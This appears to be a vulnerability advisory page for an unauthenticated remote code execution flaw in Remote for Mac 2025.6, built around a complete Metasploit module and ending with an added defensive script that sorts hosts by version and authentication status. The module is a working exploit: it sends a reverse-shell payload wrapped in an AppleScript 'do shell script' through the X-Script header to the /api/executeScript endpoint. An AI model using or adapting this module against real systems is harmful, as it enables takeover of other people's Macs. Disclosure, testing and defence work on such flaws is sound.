Remote for Mac 2025.6 - Unauthenticated RCE

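Vulnerability information

Vulnerability name: Remote for Mac 2025.6 - Unauthenticated RCE

Vulnerability ID:

  • CVE: Pending

Vulnerability type: Command execution

Severity: High

Description: Remote for Mac 2025.6 is remote-control software designed for macOS that lets a user control another Mac over the network. It is widely used in personal and enterprise environments for remote technical support, home network management and similar scenarios.

The vulnerability is in the /api/executeScript endpoint of Remote for Mac 2025.6. Because user input is not sufficiently validated, an attacker can, without authenticating, send a crafted HTTP request that delivers malicious AppleScript commands to the target system. Using AppleScript's do shell script feature, the attacker can execute arbitrary shell commands, achieving remote code execution.

Exploitation can lead to serious security risks, including but not limited to remote control of the affected system, data leakage and service disruption. Because exploitation requires no authentication and can be automated, the barrier to attack is low and the potential impact is broad. Users are advised to update to a secure version promptly or apply other mitigations to prevent potential attacks.

Vendor: Cherpake

Product: Remote for Mac

Affected version: 2025.6

Source: https://github.com/rapid7/metasploit-framework/blob/3f6f4d20993489afed96fe110b52a625dfbec434/modules%2Fexploits%2Fosx%2Fhttp%2Fremote_for_mac_rce.rb

Type: rapid7/metasploit-framework:github issues

PoC details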

##
# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
# Date: May 2025
# Exploit Author: Chokri Hammedi (@chokri0x00)
# Vendor Homepage: https://www.cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Exploit Source: https://packetstormsecurity.com/files/195347/
# Version: Remote for Mac 2025.6
# Tested on: macOS Mojave, macOS Ventura
##

require 'json'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in
          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
          disabled on the target system, it allows attackers to execute arbitrary AppleScript
          commands, which can include shell commands via `do shell script`.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Chokri Hammedi (@blue0x1)'],
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/195347/']
        ],
        'DisclosureDate' => '2025-05-27',
        'CVE' => 'Pending',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [['Auto', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 49229,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        }
      )
    )

    register_options([
      Opt::RHOST(),
      Opt::RPORT(49229),
      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
    ])
  end

  def check
    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
      'method' => 'GET',
      'ssl' => datastore['SSL']
    )

    return CheckCode::Unknown('No response from target') unless res && res.code == 200

    begin
      info = JSON.parse(res.body)
    rescue JSON::ParserError
      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
    end

    if info['requires.auth'] == true
      return CheckCode::Safe('Target requires authentication on /api/executeScript')
    end

    if info['version'] != '2025.6'
      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
    end

    CheckCode::Appears
  end

  def exploit
    unless datastore['FORCE'] || check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
    end

    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
    cmd = payload.encoded
    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
    applescript = %(do shell script "#{escaped}")

    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
      'method' => 'GET',
      'ssl' => datastore['SSL'],
      'headers' => {
        'X-ClientToken' => '1337',
        'X-HostName' => 'iFruit',
        'X-HostFullModel' => 'iFruit19,2',
        'X-Script' => applescript,
        'X-ScriptName' => 'exploit',
        'X-ScriptDelay' => '0'
      }
    )

    if res && res.code == 200
      print_good('Payload delivered successfully. Awaiting session...')
    else
      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
    end
  end
end
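
For defenders inventorying hosts, the following added example (not part of the Metasploit module or of the original page) classifies a /api/getVersion response body using the two fields the module's check reads, `version` and `requires.auth`. The host names, sample bodies, verdict labels and the `review` rule for other versions with authentication off are assumptions of this example.

```ruby
require 'json'

# Version string taken from the advisory on this page.
AFFECTED_VERSION = '2025.6'

# Classify a /api/getVersion response body. The keys 'version' and
# 'requires.auth' are the ones the module's check reads; the verdict
# symbols are this example's own labels.
def assess_exposure(body)
  info = JSON.parse(body.to_s)
  return { verdict: :unknown, reason: 'response is not a JSON object' } unless info.is_a?(Hash)

  version = info['version']
  if info['requires.auth'] == true
    { verdict: :auth_enabled, reason: "authentication enforced (version #{version.inspect})" }
  elsif version == AFFECTED_VERSION
    { verdict: :exposed, reason: 'version 2025.6 without enforced authentication' }
  elsif version.nil?
    { verdict: :unknown, reason: 'no version field in response' }
  else
    # Assumption: auth-off on a version the page does not list still merits a look.
    { verdict: :review, reason: "authentication not enforced on version #{version}" }
  end
rescue JSON::ParserError
  { verdict: :unknown, reason: 'body is not valid JSON' }
end

# Reduce a host => body map to the hosts that need remediation or review.
def hosts_needing_action(responses)
  responses.map { |host, body| [host, assess_exposure(body)[:verdict]] }
           .select { |_host, verdict| %i[exposed review].include?(verdict) }
           .to_h
end

# Constructed sample responses (not captured from real hosts).
SAMPLES = {
  'mac-01.example' => '{"version":"2025.6","requires.auth":false}',
  'mac-02.example' => '{"version":"2025.6","requires.auth":true}',
  'mac-03.example' => '{"version":"2025.5","requires.auth":false}',
  'mac-04.example' => '<html>502 Bad Gateway</html>'
}.freeze

SAMPLES.each { |host, body| puts "#{host}: #{assess_exposure(body)[:reason]}" } if __FILE__ == $PROGRAM_NAME
```

A host that reports `requires.auth` as true matches the condition under which the module's check returns Safe, so enabling authentication is the setting to verify on every instance that cannot yet be updated.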